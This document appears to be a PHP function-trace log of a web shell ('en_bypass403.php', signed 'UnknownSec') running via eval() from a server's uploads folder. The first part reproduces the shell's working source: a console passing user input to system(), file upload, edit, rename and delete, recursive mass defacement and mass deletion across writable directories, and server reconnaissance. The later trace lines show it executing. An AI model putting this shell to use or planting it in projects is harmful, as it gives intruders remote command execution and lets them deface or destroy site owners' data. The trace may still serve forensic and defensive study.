href=\'?id=delete&path=$path\'><i class=\'bi bi-trash\'></i> mass delete</a>\r\n\t\t\t<a class=\'btn btn-outline-light btn-sm\' href=\'?id=cmd&path=$path\'><i class=\'bi bi-terminal\'></i> console</a>\r\n\t\t\t<a class=\'btn btn-outline-light btn-sm\' href=\'?id=info&path=$path\'><i class=\'bi bi-info-circle\'></i> info server</a>\r\n\t\t</div>";\r\n// tools nya\r\nif(isset($_GET[\'path\'])) {\r\n\t$dir = $_GET[\'path\'];\r\n\tchdir($dir);\r\n} else {\r\n\t$dir = getcwd();\r\n}\r\n$dir = str_replace("\\\\","/",$dir);\r\n$scdir = explode("/", $dir);\t\r\nfor($i = 0; $i <= $c_dir; $i++) {\r\n\t$scdir[$i];\r\n\tif($i != $c_dir) {\r\n} elseif($_GET[\'id\'] == \'deface\'){\r\necho "$_s";\r\nfunction mass_kabeh($dir,$namafile,$isi_script) {\r\nif(is_writable($dir)) {\r\n\t$dira = scandir($dir);\r\n\tforeach($dira as $dirb) {\r\n\t\t$dirc = "$dir/$dirb";\r\n\t\t$▚ = $dirc.\'/\'.$namafile;\r\n\t\tif($dirb === \'.\') {\r\n\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t} elseif($dirb === \'..\') {\r\n\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t} else {\r\n\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\techo "[<gr><i class=\'bi bi-check-all\'></i></gr>]&nbsp;$▚<br>";\r\n\t\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t\t\t$▟ = mass_kabeh($dirc,$namafile,$isi_script);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nfunction mass_biasa($dir,$namafile,$isi_script) {\r\n\tif(is_writable($dir)) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t$▚ = $dirc.\'/\'.$namafile;\r\n\t\t\tif($dirb === \'.\') {\r\n\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\techo "[<gr><i class=\'bi bi-check-all\'></i></gr>]&nbsp;$dirb/$namafile<br>";\r\n\t\t\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nif($_POST[\'start\']) {\r\n\tif($_POST[\'tipe\'] == \'massal\') {\r\n\tmass_kabeh($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t} elseif($_POST[\'tipe\'] == \'biasa\') {\r\n\tmass_biasa($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t}\r\n\techo "<br>";\r\n}\r\necho "\r\n<div class=\'card text-dark\'>\r\n\t<div class=\'card-header\'>\r\n\t\t<form method=\'POST\'>\r\n\t\t<kbd>$_x&nbsp;Mass deface</kbd>\r\n\t\t<br>Tipe:<br>\r\n\t\t<div class=\'custom-control custom-switch\'>\r\n\t\t\t<input class=\'custom-control-input\' type=\'checkbox\' id=\'customSwitch\' name=\'tipe\' value=\'biasa\'>\r\n\t\t\t<label class=\'custom-control-label\' for=\'customSwitch\'>Biasa</label>\r\n\t\t</div>\r\n\t\t<div class=\'custom-control custom-switch\'>\r\n\t\t\t<input class=\'custom-control-input\' type=\'checkbox\' id=\'customSwitch1\' name=\'tipe\' value=\'massal\'>\r\n\t\t\t<label class=\'custom-control-label\' for=\'customSwitch1\'>Massal</label>\r\n\t\t</div>\r\n\t\t\t<i class=\'bi bi-folder\'></i> Lokasi:\r\n\t\t\t<input class=\'form-control btn-sm\' type=\'text\' name=\'d_dir\' value=\'$dir\'>\r\n\t\t\t<i class=\'bi bi-file-earmark\'></i> Nama file:\r\n\t\t\t<input class=\'form-control btn-sm\' type=\'text\' name=\'d_file\' placeholder=\'nama file\' $_r>\r\n\t\t\t<i class=\'bi bi-file-earmark\'></i> Isi file:\r\n\t\t\t<textarea class=\'form-control btn-sm\' rows=\'7\' name=\'script\' placeholder=\'isi file\' $_r></textarea>\r\n\t\t\t<input class=\'btn btn-dark btn-sm btn-block\' type=\'submit\' name=\'start\' value=\'mass deface\'>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>";\r\n} elseif($_GET[\'id\'] == \'cmd\'){\r\nif($_POST[\'ekseCMD\']) {\r\n$cmd = $_POST[\'ekseCMD\'];\r\n}\r\necho "$_s\r\n<div class=\'card text-dark\'>\r\n\t<div class=\'card-header\'>\r\n\t<kbd>$_x&nbsp;Console</kbd>\r\n\t\t<div class=\'container-fluid language-javascript\'>\r\n\t\t\t<pre style=\'font-size:10px;\'><gr>~</gr>$&nbsp;<rd>$cmd</rd><br><code>"; system($_POST[\'ekseCMD\'].\' 2>&1\'); echo "</code></pre>\r\n\t\t</div>\r\n\t\t<form method=\'POST\'>\r\n\t\t\t<div class=\'input-group mb-3\'>\r\n\t\t\t\t<input class=\'form-control btn-sm\' type=\'text\' name=\'ekseCMD\' value=\'$cmd\' placeholder=\'whoami\' $_r>\r\n\t\t\t\t<button class=\'btn btn-dark btn-sm\' type=\'sumbit\'><i class=\'bi bi-arrow-return-right\'></i></button>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>";\r\n} elseif($_GET[\'id\'] == \'info\'){\r\n$disfunc = @ini_get("disable_functions");\r\nif(empty($disfunc)) {\r\n\t$disfc = "<gr>NONE</gr>";\r\n} else {\r\n\t$disfc = "<rd>$disfunc</rd>";\r\n}\r\nif(!function_exists(\'posix_getegid\')) {\r\n\t$user = @get_current_user();\r\n\t$uid = @getmyuid();\r\n\t$gid = @getmygid();\r\n\t$group = "?";\r\n} else {\r\n\t$uid = @posix_getpwuid(posix_geteuid());\r\n\t$gid = @posix_getgrgid(posix_getegid());\r\n\t$user = $uid[\'name\'];\r\n\t$uid = $uid[\'uid\'];\r\n\t$group = $gid[\'name\'];\r\n\t$gid = $gid[\'gid\'];\r\n}\r\n$sm = (@ini_get(strtolower("safe_mode")) == \'on\') ? "<rd>ON</rd>" : "<gr>OFF</gr>";\r\necho "$_s\r\n<div class=\'card text-dark\'>\r\n\t<div class=\'card-header\'>\r\n\t<kbd>$_x&nbsp;Info server</kbd>\r\n\t\t<br>\r\n\t\tUname: <gr>".php_uname()."</gr><br />\r\n\t\tSoftware: <gr>".$_SERVER[\'SERVER_SOFTWARE\']."</gr><br />\r\n\t\tPHP version: <gr>".PHP_VERSION."</gr> <a class=\'text-decoration-none\' href=\'?id=phpinfo&path=$path\'>[ PHP INFO ]</a> PHP os: <gr>".PHP_OS."</gr><br />\r\n\t\tServer Ip: <gr>".gethostbyname($_SERVER[\'HTTP_HOST\'])."</gr><br />\r\n\t\tYour Ip: <gr>".ip()."</gr><br />\r\n\t\tUser: <gr>$user</gr> ($uid) | Group: <gr>$group</gr> ($gid)<br />\r\n\t\tSafe Mode: $sm<br />\r\n\t\t<kbd>Disable Function:</kbd><pre>$disfc</pre>\r\n\t</div>\r\n</div>\r\n<br>";\r\n} elseif($_GET[\'id\'] == \'phpinfo\'){\r\n\t@ob_start();\r\n\t@eval("phpinfo();");\r\n\t$buff = @ob_get_contents();\r\n\t@ob_end_clean();\t\r\n\t$awal = strpos($buff,"<body>")+6;\r\n\t$akhir = strpos($buff,"</body>");\r\n\techo "<pre class=\'php_info\'>".substr($buff,$awal,$akhir-$awal)."</pre>";\r\n\texit;\r\n} elseif($_GET[\'id\'] == \'upload\'){\r\necho "$_s\r\n<div class=\'card text-dark\'>\r\n\t<div class=\'card-header\'>";\r\nif(isset($_FILES[\'file\'])){\r\n\tif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\n\t\techo \'<strong>Upload</strong> ok! \'.ok().\'</div>\';\r\n\t\t} else {\r\n\t\techo \'<strong>Upload</strong> gagal! \'.er().\'</div>\';\r\n\t\t}\r\n\t}\r\necho "\r\n\t\t<form method=\'POST\' enctype=\'multipart/form-data\'>\r\n\t\t\t<kbd>$_x&nbsp;Upload File</kbd>\r\n\t\t\t<div class=\'input-group mb-3\'>\r\n\t\t\t\t<input class=\'form-control form-control-sm\' type=\'file\' name=\'file\' $_r>\r\n\t\t\t\t<button class=\'btn btn-dark btn-sm\' type=\'submit\'><i class=\'bi bi-arrow-return-right\'></i></button>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>";\r\n} elseif($_GET[\'id\'] == \'filebaru\') {\r\necho "$_s";\r\nif(isset($_POST[\'bikin\'])){\r\n\t$name = $_POST[\'nama_file\'];\r\n\t$isi_file = $_POST[\'isi_file\'];\r\n\tforeach ($name as $nama_file){\r\n\t\t$handle = @fopen("$nama_file", "w");\r\n\t\tif($isi_file){\r\n\t\t\t$buat = @fwrite($handle, $isi_file);\r\n\t\t} else {\r\n\t\t\t$buat = $handle;\r\n\t\t}\r\n\t}\r\n\tif($buat){\r\n\t\techo \'<strong>Buat file</strong> ok! \'.ok().\'</div>\';\r\n\t} else {\r\n\t\techo \'<strong>Buat file</strong> gagal! \'.er().\'</div>\';\r\n\t\t}\r\n\t}\r\necho "\r\n<div class=\'card text-dark\'>\r\n\t<div class=\'card-header\'>\r\n\t\t<kbd>$_x&nbsp;Buat file</kbd>\r\n\t\t<form method=\'POST\'>\r\n\t\t\t<i class=\'bi bi-file-earmark\'></i> Nama file:\r\n\t\t\t<input class=\'form-control form-control-sm\' type=\'text\' name=\'nama_file[]\' placeholder=\'Nama file\' $_r>\r\n\t\t\t<i class=\'bi bi-file-earmark\'></i> Isi file:\r\n\t\t\t<textarea class=\'form-control form-control-sm\' name=\'isi_file\' rows=\'7\' placeholder=\'Isi file\' $_r ></textarea>\r\n\t\t\t<input class=\'btn btn-dark btn-sm btn-block\' type=\'submit\' name=\'bikin\' value=\'buat\'>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>";\r\n} elseif($_GET[\'id\'] == \'dirbaru\'){\r\necho "$_s";\r\nif(isset($_POST[\'buat\'])){\r\n\t$nama = $_POST[\'nama_dir\'];\r\n\tforeach ($nama as $nama_dir){\r\n\t\t$folder = preg_replace("([^\\w\\s\\d\\-_~,;:\\[\\]\\(\\].]|[\\.]{2,})", \'\', $nama_dir);\r\n\t\t$fd = @mkdir ($folder);\r\n\t}\r\n\tif($fd){\r\n\t\techo \'<strong>Buat dir</strong> ok! \'.ok().\'</div>\';\r\n\t} else {\r\n\t\techo \'<strong>Buat dir</strong> gagal! \'.er().\'</div>\';\r\n\t\t}\r\n\t}\r\necho "\r\n<div class=\'card text-dark\'>\r\n\t<div class=\'card-header\'>\r\n\t\t<kbd>$_x&nbsp;Buat dir</kbd>\r\n\t\t<form method=\'POST\'>\r\n\t\t\t<i class=\'bi bi-folder\'></i> Nama dir:\r\n\t\t\t<div class=\'input-group mb-3\'>\r\n\t\t\t\t<input class=\'form-control form-control-sm\' type=\'text\' name=\'nama_dir[]\' placeholder=\'Nama dir\' $_r>\r\n\t\t\t\t<input class=\'btn btn-dark btn-sm\' type=\'submit\' name=\'buat\' value=\'buat\'>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t</div>\r\n</div>\r\n<br>";\r\n} elseif($_GET[\'id\'] == \'delete\'){\r\necho "$_s";\r\nfunction hapus_massal($dir,$namafile) {\r\nif(is_writable($dir)) {\r\n\t$dira = scandir($dir);\r\n\tforeach($dira as $dirb) {\r\n\t\t$dirc = "$dir/$dirb";\r\n\t\t$▚ = $dirc.\'/\'.$namafile;\r\n\t\tif($dirb === \'.\') {\r\n\t\t\tif(file_exists("$dir/$namafile")) {\r\n\t\t\t\tunlink("$dir/$namafile");\r\n\t\t\t}\r\n\t\t} elseif($dirb === \'..\') {\r\n\t\t\tif(file_exists("".dirname($dir)."/$namafile")) {\r\n\t\t\t\tunlink("".dirname($dir)."/$namafile");\r\n\t\t\t}\r\n\t\t} else {\r\n\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\tif(file_exists($▚)) {\r\n\t\t\t\t\t\techo "[<gr><i class=\'bi bi-check-all\'></i></gr>]&nbsp;$▚<br>";\r\n\t\t\t\t\t\tunlink($▚);\r\n\t\t\t\t\t\t$▟ = hapus_massal($dirc,$namafile);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nif($_POST[\'start\']) {\r\n\thapus_massal($_POST[\'d_dir\'], $_POST[\'d_file\']);\r\n\techo "<br>";\r\n}\r\necho "\r\n<div class=\'card text-dark\'>\r\n\t<div class=\'card-header\'>\r\n\t\t<form method=\'POST\'>\r\n\t\t<kbd>$_x&nbsp;Mass delete</kbd>\r\n\t\t<br>\r\n\t\t<i class=\'bi bi-folder\'></i> Lokasi:\r\n\t\t\t<input class=\'form-control btn-sm\' type=\'text\' name=\'d_dir\' value=\'$dir\'>\r\n\t\t\t\t<i class=\'bi bi-file-earmark\'></i> Nama file:\r\n\t\t\t<div class=\'input-group mb-3\'>\r\n\t\t\t\t<input class=\'form-control btn-sm\' type=\'text\' name=\'d_file\' placeholder=\'nama file\' $_r><br>\r\n\t\t\t<div class=\'input-group-append\'>\r\n\t\t\t\t<input class=\'btn btn-dark btn-sm\' type=\'submit\' name=\'start\' value=\'mass delete\'>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<br>";\r\n\t}\r\n}\r\n// akhir tools\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<br><b>name : </b>".basename($_GET[\'filesrc\']);"</br>";\r\necho \'<div class="shell pre" id="see"><pre style="font-size:10px;">\'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</pre></div><br/>\';\r\n} elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'<br><b>name : </b>\'.basename($_POST[\'path\']);\'</br>\';\r\n//rename file\r\nif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<strong>Rename</strong> ok! \'.ok().\'</div>\';\r\n\t} else {\r\necho \'<strong>Rename</strong> gagal! \'.er().\'</div>\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'\r\n<form method="POST">\r\n\t<div class="input-group mb-3">\r\n\t\t<input class="form-control form-control-sm" name="newname" type="text" value="\'.$_POST[\'name\'].\'" />\r\n\t\t\t<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n\t\t<input type="hidden" name="opt" value="rename">\r\n\t\t<input class="btn btn-outline-light btn-sm" type="submit" value="rename"/>\r\n\t</div>\r\n</form>\';\r\n} elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<strong>Edit</strong> ok! \'.ok().\'</div>\';\r\n\t} else {\r\necho \'<strong>Edit</strong> gagal! \'.er().\'</div>\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'\r\n<form method="POST">\r\n\t<textarea class="form-control form-control-sm" rows="7" name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br />\r\n\t\t<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n\t\t<input type="hidden" name="opt" value="edit">\r\n\t<input class="btn btn-outline-light btn-sm btn-block" type="submit" value="edit"/>\r\n</form>\r\n<br>\';\r\n\t}\r\n} else {\r\n//delete dir & file\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\n\techo \'<strong>Delete dir</strong> ok! \'.ok().\'</div>\';\r\n\t} else {\r\n\techo \'<strong>Delete dir</strong> gagal! \'.er().\'</div>\';\r\n\t}\r\n} elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\n\techo \'<strong>Delete file</strong> ok! \'.ok().\'</div>\';\r\n\t} else {\r\n\techo \'<strong>Delete file</strong> gagal! \'.er().\'</div>\';\r\n\t\t}\r\n\t}\r\n}\r\n$scandir = scandir($path);\r\n$pa = getcwd();\r\necho \'<div class="table-responsive">\r\n<table class="table table-hover table-dark text-light">\r\n<thead>\r\n<tr>\r\n\t<td class="text-center">name</td>\r\n\t\t<td class="text-center">last edit</td>\r\n\t\t<td class="text-center">size</td>\r\n\t\t<td class="text-center">owner<gr>:</gr>downer</td>\r\n\t\t<td class="text-center">permission</td>\r\n\t<td class="text-center">options</td>\r\n</tr>\r\n</thead>\r\n<tbody class="text-nowrap">\r\n<tr>\r\n\t<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=\'.dirname($dir).\'">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">\r\n\t\t<div class="btn-group">\r\n\t\t\t<a class="btn btn-outline-light btn-sm" href="?id=filebaru&path=\'.$dir.\'"><i class="bi bi-file-earmark-plus-fill"></i></a>\r\n\t\t\t<a class="btn btn-outline-light btn-sm" href="?id=dirbaru&path=\'.$dir.\'"><i class="bi bi-folder-plus"></i></a>\r\n\t\t</div>\r\n\t</td>\r\n</tr>\';\r\nforeach($scandir as $dir){\r\n$dt = date("Y-m-d H:i:s", filemtime("$path/$dir"));\r\n\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t$downer = @posix_getpwuid(fileowner("$path/$dir"));\r\n\t\t$downer = $downer[\'name\'];\r\n\t} else {\r\n\t\t$downer = fileowner("$path/$dir");\r\n\t}\r\n\tif(function_exists(\'posix_getgrgid\')) {\r\n\t\t$dgrp = @posix_getgrgid(filegroup("$path/$dir"));\r\n\t\t$dgrp = $dgrp[\'name\'];\r\n\t} else {\r\n\t\t$dgrp = filegroup("$path/$dir");\r\n\t}\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "\r\n<tr>\r\n\t<td><i class=\'bi bi-folder-fill\'></i><a class=\'text-decoration-none text-secondary\' href=\\"?path=$path/$dir\\">$dir</a></td>\r\n\t<td class=\'text-center\'>$dt</td>\r\n\t<td class=\'text-center\'>dir</td>\r\n\t<td class=\'text-center\'>$downer<gr>:</gr>$dgrp</td>\r\n\t<td class=\'text-center\'>";\r\nif(is_writable("$path/$dir")) echo \'<gr>\';\r\nelseif(!is_readable("$path/$dir")) echo \'<rd>\';\r\necho p("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</gr></rd></td>\';\r\necho "\r\n\t<td class=\\"text-center\\">\r\n\t<form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n\t\t<div class=\\"btn-group\\">\r\n\t\t\t<button class=\\"btn btn-outline-light btn-sm\\" name=\\"opt\\" value=\\"rename\\"><i class=\'bi bi-pencil-fill\'></i></button>\r\n\t\t\t<button class=\\"btn btn-outline-light btn-sm\\" name=\\"opt\\" value=\\"delete\\"><i class=\'bi bi-trash-fill\'></i></button>\r\n\t\t</div>\r\n\t\t<input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\">\r\n\t\t<input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\">\r\n\t\t<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\">\r\n\t</form>\r\n\t</td>\r\n</tr>";\r\n}\r\nforeach($scandir as $file){\r\n$ft = date("Y-m-d H:i:s", filemtime("$path/$file"));\r\n\tif(!is_file($path.\'/\'.$file)) continue;\r\n\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t$fowner = @posix_getpwuid(fileowner("$path/$file"));\r\n\t\t$fowner = $fowner[\'name\'];\r\n\t} else {\r\n\t\t$fowner = fileowner("$path/$file");\r\n\t}\r\n\tif(function_exists(\'posix_getgrgid\')) {\r\n\t\t$fgrp = @posix_getgrgid(filegroup("$path/$file"));\r\n\t\t$fgrp = $fgrp[\'name\'];\r\n\t} else {\r\n\t\t$fgrp = filegroup("$path/$file");\r\n\t}\r\necho "\r\n<tr>\r\n\t<td><i class=\'bi bi-file-earmark-code-fill\'></i><a class=\'text-decoration-none text-secondary\' href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td>\r\n\t<td class=\'text-center\'>$ft</td>\r\n\t<td class=\'text-center\'>".sz(filesize($file))."</td>\r\n\t<td class=\'text-center\'>$fowner<gr>:</gr>$fgrp</td>\r\n\t<td class=\'text-center\'>";\r\nif(is_writable("$path/$file")) echo \'<gr>\';\r\nelseif(!is_readable("$path/$file")) echo \'<rd>\';\r\necho p("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</gr></rd></td>\';\r\necho "\r\n\t<td class=\\"text-center\\">\r\n\t\t<form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n\t\t\t<div class=\\"btn-group\\">\r\n\t\t\t\t<button class=\\"btn btn-outline-light btn-sm\\" name=\\"opt\\" value=\\"edit\\"><i class=\'bi bi-pencil-square\'></i></button>\r\n\t\t\t\t<button class=\\"btn btn-outline-light btn-sm\\" name=\\"opt\\" value=\\"rename\\"><i class=\'bi bi-pencil-fill\'></i></button>\r\n\t\t\t\t<button class=\\"btn btn-outline-light btn-sm\\" name=\\"opt\\" value=\\"download\\"><i class=\'bi bi-download\'></i></button>\r\n\t\t\t\t<button class=\\"btn btn-outline-light btn-sm\\" name=\\"opt\\" value=\\"delete\\"><i class=\'bi bi-trash-fill\'></i></button>\r\n\t\t\t</div>\r\n\t\t\t<input type=\\"hidden\\" name=\\"type\\" value=\\"file\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\">\r\n\t\t</form>\r\n\t</td>\r\n</tr>";\r\n\t}\r\n}\r\necho "\r\n</tbody>\r\n</table>\r\n<div class=\'text-secondary\'>&copy; ".date("Y")." $_n</div>\r\n</div>\r\n</div>\r\n</body>\r\n</html>";\r\n'	/var/www/html/uploads/en_bypass403.php(10) : eval()'d code	5	0
4	18	0	0.003064	584656	date_default_timezone_set	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	2	1	'Asia/Jakarta'
4	18	1	0.003083	584720
4	18	R			TRUE
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	3	$_n = 'UnknownSec'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	4	$_s = '<style>table{display:none;}</style><div class=\'table-responsive\'><hr></div>'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	5	$_r = 'required=\'required\''
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	6	$_x = '<i class=\'bi bi-gear-fill\'></i>'
4	19	0	0.003157	584672	getcwd	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	121	0
4	19	1	0.003173	584720
4	19	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	121	$path = '/var/www/html/uploads'
4	20	0	0.003201	584720	str_replace	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	123	3	'\\'	'/'	'/var/www/html/uploads'
4	20	1	0.003218	584816
4	20	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	123	$path = '/var/www/html/uploads'
4	21	0	0.003244	584720	explode	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	124	2	'/'	'/var/www/html/uploads'
4	21	1	0.003260	585296
4	21	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	124	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	125	$id = 0
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	127	$a = TRUE
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	125	$id = 1
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i = 0
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	125	$id = 2
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i = 0
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	125	$id = 3
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i = 0
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	125	$id = 4
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i = 0
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
3		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	133	$i++
4	22	0	0.003527	585224	p	1		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	139	1	'/var/www/html/uploads'
5	23	0	0.003542	585224	fileperms	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	55	1	'/var/www/html/uploads'
5	23	1	0.003568	585288
5	23	R			16895
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	55	$p = 16895
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	56	$i = 'u'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	61	$i = 'd'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	64	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	65	$i .= 'w'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	66	$i .= 'x'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	67	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	68	$i .= 'w'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	69	$i .= 'x'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	70	$i .= 'r'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	71	$i .= 'w'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	72	$i .= 'x'
4	22	1	0.003710	585288
4	22	R			'drwxrwxrwx'
4	24	0	0.003724	585288	▟	1		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	139	2	'/var/www/html/uploads'	'drwxrwxrwx'
5	25	0	0.003739	585288	getcwd	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	17	0
5	25	1	0.003754	585336
5	25	R			'/var/www/html/uploads'
4		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	17	$▚ = '/var/www/html/uploads'
5	26	0	0.003780	585336	is_writable	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	19	1	'/var/www/html/uploads'
5	26	1	0.003799	585376
5	26	R			TRUE
4	24	1	0.003813	585336
4	24	R			'<gr>drwxrwxrwx</gr>'
4	27	0	0.003829	585248	getcwd	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code(5) : eval()'d code	158	0
4	27	1	0.003843	585296
4	27	R			'/var/www/html/uploads'
